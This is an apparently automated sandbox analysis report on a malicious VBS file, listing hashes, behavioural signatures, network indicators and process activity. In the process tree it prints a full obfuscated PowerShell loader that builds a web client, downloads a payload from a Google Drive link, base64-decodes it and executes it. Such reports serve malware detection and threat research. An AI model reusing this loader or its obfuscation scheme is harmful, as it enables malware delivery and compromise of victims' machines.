Analysis
-
max time kernel
139s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
16/05/2024, 15:31
Static task
static1
Behavioral task
behavioral1
Sample
PL_PLK_PT_filter_I-534_wheels_krotki.vbs
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
PL_PLK_PT_filter_I-534_wheels_krotki.vbs
Resource
win10v2004-20240508-en
General
-
Target
PL_PLK_PT_filter_I-534_wheels_krotki.vbs
-
Size
428KB
-
MD5
811ee53795b1753be33e0cda9e0587ab
-
SHA1
283006567e33997732b2082d7a22b704eec460e7
-
SHA256
c0380044032fcfa783160e36c4f77b0a1a70f763dd48d7e602441523ce59b193
-
SHA512
98be5d982daeae3e703a869bf6de66035fc6538f60d00f680c3e2280c0039bc10deb84c40a4d51a66064470d8f6221efa2d2c16a193ecf59d18aadaa3ff6d26d
-
SSDEEP
6144:wY4t1fXGwzkAitPzmeI9OQYypkHkSVdtxQ+5iYgbAL0WMhw19+z0yhtHn9eq/+4Z:wzJv0ayfOb64MRycngoavbN0vBrbRHkb
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 3408 WScript.exe 8 2332 powershell.exe 14 2332 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 7 drive.google.com 8 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2332 powershell.exe 2332 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2332 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3408 wrote to memory of 2332 3408 WScript.exe 86 PID 3408 wrote to memory of 2332 3408 WScript.exe 86 PID 2332 wrote to memory of 5108 2332 powershell.exe 88 PID 2332 wrote to memory of 5108 2332 powershell.exe 88
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PL_PLK_PT_filter_I-534_wheels_krotki.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Etaarigt = 1;$Naturfnomens213='Sub';$Naturfnomens213+='strin';$Naturfnomens213+='g';Function Aristocrats($Applause){$Kildre=$Applause.Length-$Etaarigt;For($Extradition=1;$Extradition -lt $Kildre;$Extradition+=2){$Unwakefulness+=$Applause.$Naturfnomens213.Invoke( $Extradition, $Etaarigt);}$Unwakefulness;}function Caradhras($Adapted){& ($Disciplineret190) ($Adapted);}$marica=Aristocrats 'TMGonzUi l.l a,/M5 . 0 J(WW.i n d o.w s. SN.TL B1M0P. 0 ; W iFn.6.4 ;M Ax 6.4B; rSv :,1b2N1 .J0F)G bGSeEc kSo /N2,0.1.0M0 1U0A1H DF iGr.eUf.ogxM/.1,2.1 . 0 ';$Formuefllesskaberne=Aristocrats 'DUTs e.r -mA g eDn tM ';$Sportswomanly=Aristocrats ',hGtct pSs,:t/K/ dPr.iOv,eR..gHoSoOg lmeS.uc oSm./.u c.?.eGxUpBoDrVt =Hdio w n.lGoiaAd &eiRdH=.1.u,C Iam A m,eUKGZ a,u,c,RGB,M s sMBmSHx k,dGj,W qRYBD,bcHds FAm ';$craunch=Aristocrats 'S>H ';$Disciplineret190=Aristocrats 'UiBeSxU ';$Aftrre='Scalado';$Skidengs = Aristocrats '.ePc h oP %GaBpRpPd aStuaR%Y\SMNa cBehlSl u m,.ZI nAs R&B& Ee c hCoS tS ';Caradhras (Aristocrats 'R$SgDl,oPbOaAl :kSAt yGnDiMnRg ss=F(UcUmUd. K/.cR B$,SIk i,dIetn gHsH)G ');Caradhras (Aristocrats 'R$MgKlEoCbMa lS:.MCuAsBe uFm sTfHoAn.dOe nU= $ S.pCoDrPtAs w,o.mGaCnSlCyG.SsEpSlSiNtH(P$ cAr a,uGnPcOhP)C ');$Sportswomanly=$Museumsfonden[0];$Indsyet= (Aristocrats '.$ gAl,o,bGa lP:.A,mHb o lRtHe nTe =.NFe wE-VO bFjHe cAtM SSfyFs.t e mB. N e tT.DW eMb CDlRiKeNnTt');$Indsyet+=$Stynings[1];Caradhras ($Indsyet);Caradhras (Aristocrats ' $TATmIb.o.l t.eNn,eS.HHEe ard,ePr.sC[ $UFMoNr.mTu eAfClPlPe.s s,k a bCe r nMeG] =U$SmCa rOiKc.a, ');$Agalinis=Aristocrats '.$UApmUb oSl.t e n eS. D oswTn.lro,aTdFF iUlFeR(N$.S p,oOrQtMsPwuo m.a n lFy.,,$HN.ornKlUi tBu rAg i cA) ';$Nonliturgic=$Stynings[0];Caradhras (Aristocrats 'V$ g.l o bDa l :.B.e dDr,i vAe r,= (wTSeSs t -RPSaSt,h T$TNGo,nElAi tSuPr geiSc,). ');while (!$Bedriver) {Caradhras (Aristocrats 'r$ gSlOo bHaUlC:PA nRg.uCs tRi s e lBlfaHtAe =L$ft.r uGe. ') ;Caradhras $Agalinis;Caradhras (Aristocrats '.S t a rLt -SS l.e eSp l4 ');Caradhras (Aristocrats 'F$Tg,lPoSbBaDl :DBIe d,r,iVvBewr =.(FTSe sPtN-.PAaRtBh ,$TN,oBnUlaiKt uJr g,i c )L ') ;Caradhras (Aristocrats 'M$.gNl,o b aFl,:SBBlAaPnDk,o,fGuDl d,m aFg t,e na=U$AgIlFo b.aOl :KH.eOl p mIe eHtB+ +H% $AM.u,s eBuDmDs f,oFn dBeCn ..c.o u.n t ') ;$Sportswomanly=$Museumsfonden[$Blankofuldmagten];}$Forumize=349551;$Dialyseredes=25578;Caradhras (Aristocrats 'R$ g,laoVb,aBl,:.O rSbOiUc U=S LG eTtM-EC o.nUtRedn tA R$QNFo,nzl.ittSuKr gAiBc ');Caradhras (Aristocrats 'S$ g.lSoWb aEl :CSFu,c cGe s sUitvMtO F=D S[ S.y sKtbeSm..,C oTnsv,e,rHtP],:.:OFTr.oPm BBajsTe,6 4 S t r ian gK(.$ O r b,idc )D ');Caradhras (Aristocrats ',$ g lGoRb.aTlA: T r k,g,rVu n.dSl alg eBt.s S=. [ S yKs t eLmH. TCe.x tD.REUnRc o dWi.n,gN],: : A S.CKI I .SGUe tSS.t rHi nRg.( $RSEuGcLcSe s.sJi vst )S ');Caradhras (Aristocrats ' $Og lGo.b,aDl,:GM iFs t uMrMeH= $BT,rSkAgMr,u n d lSaBg e tKsV. s upb sWtSr iSn g ( $.F oSrKu m iAzKeU, $SD i a l y,s e,r.eAd.e,sd). ');Caradhras $Misture;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Macellum.Ins && echo t"3⤵PID:5108
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82